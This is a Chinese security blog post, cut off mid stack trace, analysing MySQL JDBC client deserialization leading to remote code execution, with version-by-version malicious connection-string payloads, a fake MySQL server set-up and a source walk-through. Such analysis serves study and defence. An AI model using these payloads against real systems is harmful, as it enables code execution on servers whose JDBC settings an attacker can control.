

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">

  <link rel="apple-touch-icon" sizes="76x76" href="/img/I.png">
  <link rel="icon" href="/img/I.png">
  

  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="Infernity">
  <meta name="keywords" content="">
  
    <meta name="description" content="JDBC简介JDBC（Java DataBase Connectivity）是一种用于执行Sql语句的Java Api，即Java数据库连接，是Java语言中用来规范客户端程序如何来访问数据库的应用程序接口，可以为多种关系数据库提供统一访问，提供了诸如查询和更新数据库中数据的方法，是Java访问数据库的标准规范。简单理解为链接数据库、对数据库操作都需要通过jdbc来实现。Mysql JDBC 中包">
<meta property="og:type" content="article">
<meta property="og:title" content="JDBC反序列化">
<meta property="og:url" content="http://example.com/2026/01/14/JDBC%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/index.html">
<meta property="og:site_name" content="Infernity&#39;s Blog">
<meta property="og:description" content="JDBC简介JDBC（Java DataBase Connectivity）是一种用于执行Sql语句的Java Api，即Java数据库连接，是Java语言中用来规范客户端程序如何来访问数据库的应用程序接口，可以为多种关系数据库提供统一访问，提供了诸如查询和更新数据库中数据的方法，是Java访问数据库的标准规范。简单理解为链接数据库、对数据库操作都需要通过jdbc来实现。Mysql JDBC 中包">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://example.com/img/JDBC%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/JDBC.png">
<meta property="article:published_time" content="2026-01-14T08:40:00.000Z">
<meta property="article:modified_time" content="2026-01-14T08:42:30.700Z">
<meta property="article:author" content="Infernity">
<meta property="article:tag" content="JAVA">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="http://example.com/img/JDBC%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/JDBC.png">
  
  
    <meta name="referrer" content="no-referrer-when-downgrade">
  
  
  <title>JDBC反序列化 - Infernity&#39;s Blog</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1749284_5i9bdhy70f8.css">



<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1736178_k526ubmyhba.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.9.8","typing":{"enable":true,"typeSpeed":150,"cursorChar":"_","loop":true,"scope":["home"]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":"§"},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false},"umami":{"src":null,"website_id":null,"domains":null,"start_time":"2024-01-01T00:00:00.000Z","token":null,"api_server":null}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 6.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>Infernity&#39;s blog</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/friends/" target="_self">
                <i class="iconfont icon-link-fill"></i>
                <span>friends</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/background/19.jpg') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle">JDBC反序列化</span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2026-01-14 16:40" pubdate>
          2026年1月14日 下午
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          4.1k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          35 分钟
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">JDBC反序列化</h1>
            
            
              <div class="markdown-body">
                
                <h1 id="JDBC简介"><a href="#JDBC简介" class="headerlink" title="JDBC简介"></a>JDBC简介</h1><p>JDBC（Java DataBase Connectivity）是一种用于执行Sql语句的Java Api，即Java数据库连接，是Java语言中用来规范客户端程序如何来访问数据库的应用程序接口，可以为多种关系数据库提供统一访问，提供了诸如查询和更新数据库中数据的方法，是Java访问数据库的标准规范。简单理解为链接数据库、对数据库操作都需要通过jdbc来实现。<br>Mysql JDBC 中包含一个危险的扩展参数： “autoDeserialize”. 当这个参数配置为 true 时，JDBC 客户端将会自动反序列化服务端返回的数据，造成RCE漏洞。</p>
<h1 id="漏洞原理"><a href="#漏洞原理" class="headerlink" title="漏洞原理"></a>漏洞原理</h1><p>若攻击者能控制JDBC连接设置项，则可以通过设置其配置指向恶意MySQL服务器触发 <code>ObjectInputStream.readObject()</code>，构造反序列化利用链从而造成RCE。<br>通过JDBC连接MySQL服务端时，会有几句<strong>内置的查询语句需执行</strong>，其中两个查询的结果集在MySQL客户端进行处理时会被 ObjectInputStream.readObject() 进行反序列化处理。如果攻击者可以控制JDBC连接设置项，那么可以通过设置其配置指向恶意MySQL服务触发MySQL JDBC客户端的反序列化漏洞。<br>可被利用的两条查询语句：</p>
<ul>
<li>SHOW SESSION STATUS</li>
<li>SHOW COLLATION</li>
</ul>
<h1 id="JDBC连接参数"><a href="#JDBC连接参数" class="headerlink" title="JDBC连接参数"></a>JDBC连接参数</h1><ul>
<li>tatementInterceptors:连接参数是用于指定实现 com.mysql.jdbc.StatementInterceptor 接口的类的逗号分隔列表的参数。这些拦截器可用于通过在查询执行和结果返回之间插入自定义逻辑来影响查询执行的结果，这些拦截器将被添加到一个链中，第一个拦截器返回的结果将被传递到第二个拦截器，以此类推。在 8.0 中被queryInterceptors参数替代。</li>
<li>queryInterceptors:一个逗号分割的Class列表（实现了com.mysql.cj.interceptors.QueryInterceptor接口的Class），在Query”之间”进行执行来影响结果。（效果上来看是在Query执行前后各插入一次操作）</li>
<li>autoDeserialize:自动检测与反序列化存在BLOB字段中的对象。</li>
<li>detectCustomCollations:驱动程序是否应该检测服务器上安装的自定义字符集&#x2F;排序规则，如果此选项设置为“true”，驱动程序会在每次建立连接时从服务器获取实际的字符集&#x2F;排序规则。这可能会显著减慢连接初始化速度。</li>
</ul>
<h1 id="MySQL-JDBC-反序列化链"><a href="#MySQL-JDBC-反序列化链" class="headerlink" title="MySQL JDBC 反序列化链"></a>MySQL JDBC 反序列化链</h1><h2 id="detectCustomCollations链"><a href="#detectCustomCollations链" class="headerlink" title="detectCustomCollations链"></a>detectCustomCollations链</h2><ul>
<li>5.1.18及以下：不可用</li>
<li>5.1.19-5.1.28：<code>jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&amp;user=xxx</code></li>
<li>5.1.29-5.1.48：<code>jdbc:mysql://127.0.0.1:3306/test?detectCustomCollations=true&amp;autoDeserialize=true&amp;user=xxx</code></li>
<li>5.1.49：不可用</li>
<li>6.0.x：<code>jdbc:mysql://127.0.0.1:3306/test?detectCustomCollations=true&amp;autoDeserialize=true&amp;user=xxx</code></li>
<li>8.x.x ：不可用</li>
</ul>
<h2 id="ServerStatusDiffInterceptor链"><a href="#ServerStatusDiffInterceptor链" class="headerlink" title="ServerStatusDiffInterceptor链"></a>ServerStatusDiffInterceptor链</h2><ul>
<li>5.1.0-5.1.10：<code>jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&amp;statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor&amp;user=xxx</code> <strong>连接后需执行查询</strong></li>
<li>5.1.11-5.1.48：<code>jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&amp;statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor&amp;user=xxx</code></li>
<li>5.1.49：不可用</li>
<li>6.x：<code>jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&amp;statementInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&amp;user=xxx</code></li>
<li>8.0.7-8.0.19：<code>jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&amp;queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&amp;user=xxx</code></li>
</ul>
<h1 id="环境配置"><a href="#环境配置" class="headerlink" title="环境配置"></a>环境配置</h1><p>jdk8u66</p>
<p>为了方便后续测试反序列化，这里把commons-collections的依赖加上：pom.xml</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs xml"><span class="hljs-tag">&lt;<span class="hljs-name">dependencies</span>&gt;</span><br>  <span class="hljs-tag">&lt;<span class="hljs-name">dependency</span>&gt;</span><br>    <span class="hljs-tag">&lt;<span class="hljs-name">groupId</span>&gt;</span>commons-collections<span class="hljs-tag">&lt;/<span class="hljs-name">groupId</span>&gt;</span><br>    <span class="hljs-tag">&lt;<span class="hljs-name">artifactId</span>&gt;</span>commons-collections<span class="hljs-tag">&lt;/<span class="hljs-name">artifactId</span>&gt;</span><br>    <span class="hljs-tag">&lt;<span class="hljs-name">version</span>&gt;</span>3.2.1<span class="hljs-tag">&lt;/<span class="hljs-name">version</span>&gt;</span><br>  <span class="hljs-tag">&lt;/<span class="hljs-name">dependency</span>&gt;</span><br>  <span class="hljs-tag">&lt;<span class="hljs-name">dependency</span>&gt;</span><br>    <span class="hljs-tag">&lt;<span class="hljs-name">groupId</span>&gt;</span>mysql<span class="hljs-tag">&lt;/<span class="hljs-name">groupId</span>&gt;</span><br>    <span class="hljs-tag">&lt;<span class="hljs-name">artifactId</span>&gt;</span>mysql-connector-java<span class="hljs-tag">&lt;/<span class="hljs-name">artifactId</span>&gt;</span><br>    <span class="hljs-tag">&lt;<span class="hljs-name">version</span>&gt;</span>5.1.28<span class="hljs-tag">&lt;/<span class="hljs-name">version</span>&gt;</span><br>  <span class="hljs-tag">&lt;/<span class="hljs-name">dependency</span>&gt;</span><br><span class="hljs-tag">&lt;/<span class="hljs-name">dependencies</span>&gt;</span><br></code></pre></td></tr></table></figure>

<p>Fake MySQL Server我这里用java web chains代替：</p>
<p><img src="/img/JDBC%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/1768273684447-ece71d88-32f3-4cbf-a3e4-09f71b89ce8e.png" srcset="/img/loading.gif" lazyload></p>
<p>反序列化payload都用CC链。</p>
<p><img src="/img/JDBC%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/1768273711583-3a3bfd65-2b12-458a-b00f-c93e6650e6fd.png" srcset="/img/loading.gif" lazyload></p>
<h1 id="利用链分析"><a href="#利用链分析" class="headerlink" title="利用链分析"></a>利用链分析</h1><h2 id="detectCustomCollations链："><a href="#detectCustomCollations链：" class="headerlink" title="detectCustomCollations链："></a>detectCustomCollations链：</h2><p>测试模版：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><code class="hljs java"><span class="hljs-keyword">import</span> java.sql.Connection;<br><span class="hljs-keyword">import</span> java.sql.DriverManager;<br><br><br><span class="hljs-keyword">public</span> <span class="hljs-keyword">class</span> <span class="hljs-title class_">Main</span> &#123;<br>    <span class="hljs-keyword">public</span> <span class="hljs-keyword">static</span> <span class="hljs-keyword">void</span> <span class="hljs-title function_">main</span><span class="hljs-params">(String[] args)</span> <span class="hljs-keyword">throws</span> Exception &#123;<br>        <span class="hljs-comment">//加载驱动</span><br>        Class.forName(<span class="hljs-string">&quot;com.mysql.jdbc.Driver&quot;</span>);<br>        <span class="hljs-comment">//用户连接信息</span><br>        <span class="hljs-type">String</span> <span class="hljs-variable">url</span> <span class="hljs-operator">=</span> <span class="hljs-string">&quot;payload放这里&quot;</span>;<br>        <span class="hljs-comment">//连接数据库</span><br>        <span class="hljs-type">Connection</span> <span class="hljs-variable">connection</span> <span class="hljs-operator">=</span> DriverManager.getConnection(url);<br>        connection.close();<br>    &#125;<br>&#125;<br></code></pre></td></tr></table></figure>

<h3 id="5-1-19-5-1-28（主要分析）"><a href="#5-1-19-5-1-28（主要分析）" class="headerlink" title="5.1.19-5.1.28（主要分析）"></a>5.1.19-5.1.28（主要分析）</h3><h4 id="payload"><a href="#payload" class="headerlink" title="payload"></a>payload</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">jdbc:mysql://127.0.0.1:3308/test?autoDeserialize=true&amp;user=d5fc4f0<br></code></pre></td></tr></table></figure>

<p><img src="/img/JDBC%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/1768273887155-374398c2-9ef7-4b70-995f-25698268e667.png" srcset="/img/loading.gif" lazyload></p>
<h4 id="分析"><a href="#分析" class="headerlink" title="分析"></a>分析</h4><p>进入<code>java.sql.DriverManager#getConnection()</code>方法：</p>
<p><img src="/img/JDBC%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/1768360252099-f66b2559-6043-41d7-b64e-1fbaac45aacc.png" srcset="/img/loading.gif" lazyload></p>
<p>调用本类的 <code>getConnection()</code> 方法：</p>
<p><img src="/img/JDBC%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/1768360543670-4544d5d8-6fa2-4ef6-8118-342169e741b1.png" srcset="/img/loading.gif" lazyload></p>
<p>检测url和数据库驱动合格之后，调用至<code>com.mysql.jdbc.NonRegisteringDriver#connect()</code>方法</p>
<p><img src="/img/JDBC%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/1768360786600-e8f44518-33cd-4cce-8689-21d48c7af155.png" srcset="/img/loading.gif" lazyload></p>
<p>在这里，对JDBC URL的前缀做了一些判断， 它根据传入的 JDBC URL 类型，决定用哪种方式建立连接（普通、负载均衡、主从复制、故障转移等）。  前两种分别是负载均衡和主从复制链接，我们都不是，直接进如普通链接。进入到<code>com.mysql.jdbc.ConnectionImpl#getInstance()</code>方法：</p>
<p><img src="/img/JDBC%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/1768361061623-56cc95ef-d6df-4a0d-a479-96b3b8beb5c1.png" srcset="/img/loading.gif" lazyload></p>
<p>继续跟进<code>com.mysql.jdbc.Util#handleNewInstance()</code>方法：</p>
<p><img src="/img/JDBC%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/1768361204982-b2cc8714-4c7c-4c9f-89dd-04b6de284748.png" srcset="/img/loading.gif" lazyload></p>
<p>这里ctor为<code>com.mysql.jdbc.JDBC4Connection</code>，创建了它的一个新的对象，我们跟进至<code>com.mysql.jdbc.JDBC4Connection</code>构造方法：</p>
<p><img src="/img/JDBC%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/1768361276282-ffc702a3-cb2b-45a9-9de2-2f16965c4bf3.png" srcset="/img/loading.gif" lazyload></p>
<p>这里直接调其父类 ConnectionImpl 的构造方法：</p>
<p><img src="/img/JDBC%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/1768361471577-d0436312-890b-4744-b67b-6029fc90f07d.png" srcset="/img/loading.gif" lazyload></p>
<p>这里把 URL 里的连接信息准备好 → 初始化驱动参数与日志&#x2F;时区等运行环境 → 真正发起到 MySQL 的网络连接（createNewIO）→ 失败就清理并抛出 SQLException → 成功就把连接登记&#x2F;跟踪起来。</p>
<p>前面都是准备连接信息，我们直接到发起MySQL网络请求的函数<code>com.mysql.jdbc.ConnectionImpl#createNewIO()</code>方法：</p>
<p><img src="/img/JDBC%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/1768361599472-dbb1fdf1-6173-47e3-b9be-ae5fb68e1d71.png" srcset="/img/loading.gif" lazyload></p>
<p>这里判断是否开启“高可用（HA）”，这里我们本地测试是没开启的，所以进入单次链接模式。其实进入<code>connectWithRetries</code>方法也是一样的。</p>
<p>跟进<code>com.mysql.jdbc.ConnectionImpl#connectOneTryOnly()</code>方法：</p>
<p><img src="/img/JDBC%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/1768361825307-acd74772-7634-4262-8b7d-a26404aae6d6.png" srcset="/img/loading.gif" lazyload></p>
<p>这个是是真正开始链接了，单独复制出来说，</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><code class="hljs java"><span class="hljs-keyword">private</span> <span class="hljs-keyword">void</span> <span class="hljs-title function_">connectOneTryOnly</span><span class="hljs-params">(<span class="hljs-type">boolean</span> isForReconnect,</span><br><span class="hljs-params">			Properties mergedProps)</span> <span class="hljs-keyword">throws</span> SQLException &#123;<br>		<span class="hljs-type">Exception</span> <span class="hljs-variable">connectionNotEstablishedBecause</span> <span class="hljs-operator">=</span> <span class="hljs-literal">null</span>;<br><br>		<span class="hljs-keyword">try</span> &#123;<br>			<span class="hljs-comment">//这里真正建立 MySQL 网络连接，完成TCP 连接、MySQL 协议握手、认证（用户名/密码）、初始化 session</span><br>			coreConnect(mergedProps);<br>			<span class="hljs-built_in">this</span>.connectionId = <span class="hljs-built_in">this</span>.io.getThreadId();<br>			<span class="hljs-built_in">this</span>.isClosed = <span class="hljs-literal">false</span>;<br><br>			<span class="hljs-comment">//保存“旧连接状态”（为重连做准备）</span><br>			<span class="hljs-type">boolean</span> <span class="hljs-variable">oldAutoCommit</span> <span class="hljs-operator">=</span> getAutoCommit();<br>			<span class="hljs-type">int</span> <span class="hljs-variable">oldIsolationLevel</span> <span class="hljs-operator">=</span> <span class="hljs-built_in">this</span>.isolationLevel;<br>			<span class="hljs-type">boolean</span> <span class="hljs-variable">oldReadOnly</span> <span class="hljs-operator">=</span> isReadOnly(<span class="hljs-literal">false</span>);<br>			<span class="hljs-type">String</span> <span class="hljs-variable">oldCatalog</span> <span class="hljs-operator">=</span> getCatalog();<br>            <span class="hljs-comment">//把 Connection 上配置的 statement interceptors 注入到底层 IO</span><br>			<span class="hljs-built_in">this</span>.io.setStatementInterceptors(<span class="hljs-built_in">this</span>.statementInterceptors);<br>			<br>			<span class="hljs-comment">// 从服务器重新初始化属性，读取“这个连接对应的 MySQL Server 能力、会话变量和行为特性”，然后同步到 JDBC 驱动内部字段。</span><br>			initializePropsFromServer();<br></code></pre></td></tr></table></figure>

<p>这里就会在链接的时候自动化进行一些查询，就是在漏洞原理里说的<code>SHOW COLLATION</code>，后面会讲。</p>
<p>跟进<code>com.mysql.jdbc.ConnectionImpl#initializePropsFromServer()</code>方法：</p>
<p>这个函数在连接建立后，向 MySQL 服务器读取“当前连接能用什么、该怎么用”，并据此初始化驱动行为。</p>
<p><img src="/img/JDBC%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/1768362629369-1f7d81a1-8ddc-4fba-80c9-0693b6370e3e.png" srcset="/img/loading.gif" lazyload></p>
<p>如果服务器版本大于3.21.22进入<code>com.mysql.jdbc.ConnectionImpl#buildCollationMapping()</code>方法：</p>
<p>它从 MySQL 服务器读取所有 collation 信息，建立“collationId → 字符集 &#x2F; Java 编码”的映射表，并按 URL 缓存起来，供后续字符串编解码使用。</p>
<p>上面没截图的代码逻辑是：只在 MySQL 4.1+ 才进行下面的部分，先尝试从缓存拿（按 URL 缓存），如果开启了缓存服务器配置，并且当前 URL 已经加载过，那么就直接复用，避免每次新连接都查数据库。</p>
<p><img src="/img/JDBC%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/1768363068537-ceee5261-ad08-489b-9cc3-5b56c08509ce.png" srcset="/img/loading.gif" lazyload></p>
<p>如果缓存没有，就从服务器查<code>results = stmt.executeQuery(&quot;SHOW COLLATION&quot;);</code>这就是关键的“从服务端读取”。从服务端读取到SHOW COLLATION的结果后，把结果传入<code>com.mysql.jdbc.Util#resultSetToMap()</code>方法：</p>
<p><img src="/img/JDBC%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/1768369789105-2d7406e9-26f4-43be-afd8-90b345ad6dba.png" srcset="/img/loading.gif" lazyload></p>
<p>这个方法把 ResultSet 的每一行，按“指定列 → 指定列”的方式，塞进一个 Map 里。</p>
<p>继续跟进最后的<code>com.mysql.jdbc.ResultSetImpl#getObject()</code>方法：</p>
<p><img src="/img/JDBC%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/1768370385351-74701130-05a9-43e8-93be-85f74f8a4a40.png" srcset="/img/loading.gif" lazyload></p>
<p>这个方法根据该列的 SQL 类型，把底层字节数据转换成“最合适的 Java 对象”返回。着重看这个部分：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><code class="hljs java"><span class="hljs-keyword">case</span> Types.LONGVARBINARY:<br><span class="hljs-keyword">if</span> (field.getMysqlType() == MysqlDefs.FIELD_TYPE_GEOMETRY) &#123; <span class="hljs-comment">//如果是 GEOMETRY：直接返回原始 bytes</span><br>    <span class="hljs-keyword">return</span> getBytes(columnIndex);<br>&#125; <span class="hljs-keyword">else</span> <span class="hljs-keyword">if</span> (field.isBinary() || field.isBlob()) &#123;<br>    <span class="hljs-type">byte</span>[] data = getBytes(columnIndex);  <span class="hljs-comment">//如果是二进制列或 BLOB：先取出 bytes</span><br><br>    <span class="hljs-keyword">if</span> (<span class="hljs-built_in">this</span>.connection.getAutoDeserialize()) &#123;  <span class="hljs-comment">//如果开启了 autoDeserialize：尝试把 bytes 当“Java 序列化对象”反序列化,这里我们已经手动开启了</span><br>        <span class="hljs-type">Object</span> <span class="hljs-variable">obj</span> <span class="hljs-operator">=</span> data;<br><br>        <span class="hljs-keyword">if</span> ((data != <span class="hljs-literal">null</span>) &amp;&amp; (data.length &gt;= <span class="hljs-number">2</span>)) &#123;<br>            <span class="hljs-comment">//它会检查前两个字节：</span><br>            <span class="hljs-comment">//-84, -19 对应十六进制 0xAC 0xED 这是 Java 序列化流的 magic header</span><br>            <span class="hljs-keyword">if</span> ((data[<span class="hljs-number">0</span>] == -<span class="hljs-number">84</span>) &amp;&amp; (data[<span class="hljs-number">1</span>] == -<span class="hljs-number">19</span>)) &#123;<br>                <span class="hljs-comment">// Serialized object?</span><br>                <span class="hljs-keyword">try</span> &#123;<br>                    <span class="hljs-comment">//然后就是熟悉的反序列化起点了</span><br>                    <span class="hljs-type">ByteArrayInputStream</span> <span class="hljs-variable">bytesIn</span> <span class="hljs-operator">=</span> <span class="hljs-keyword">new</span> <span class="hljs-title class_">ByteArrayInputStream</span>(data);<br>                    <span class="hljs-type">ObjectInputStream</span> <span class="hljs-variable">objIn</span> <span class="hljs-operator">=</span> <span class="hljs-keyword">new</span> <span class="hljs-title class_">ObjectInputStream</span>(bytesIn);<br>                    obj = objIn.readObject();<br>                    objIn.close();<br>                    bytesIn.close();<br></code></pre></td></tr></table></figure>

<p>到这里整条链子就分析完毕，所以要利用漏洞要求有可控的jdbc链接，目标机器要出网。然后我们这里自己开启一个恶意的mysql服务器，把<code>SHOW COLLATION</code>的结果变成恶意的java序列化payload，一旦目标机器链接就会执行反序列化了。</p>
<p>整个堆栈：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><code class="hljs plain">at com.mysql.jdbc.ResultSetImpl.getObject(ResultSetImpl.java:5016)<br>at com.mysql.jdbc.Util.resultSetToMap(Util.java:508)<br>at com.mysql.jdbc.ConnectionImpl.buildCollationMapping(ConnectionImpl.java:1004)<br>at com.mysql.jdbc.ConnectionImpl.initializePropsFromServer(ConnectionImpl.java:3600)<br>at com.mysql.jdbc.ConnectionImpl.connectOneTryOnly(ConnectionImpl.java:2541)<br>at com.mysql.jdbc.ConnectionImpl.createNewIO(ConnectionImpl.java:2311)<br>at com.mysql.jdbc.ConnectionImpl.&lt;init&gt;(ConnectionImpl.java:834)<br>at com.mysql.jdbc.JDBC4Connection.&lt;init&gt;(JDBC4Connection.java:47)<br>at sun.reflect.NativeConstructorAccessorImpl.newInstance0(NativeConstructorAccessorImpl.java:-1)<br>at 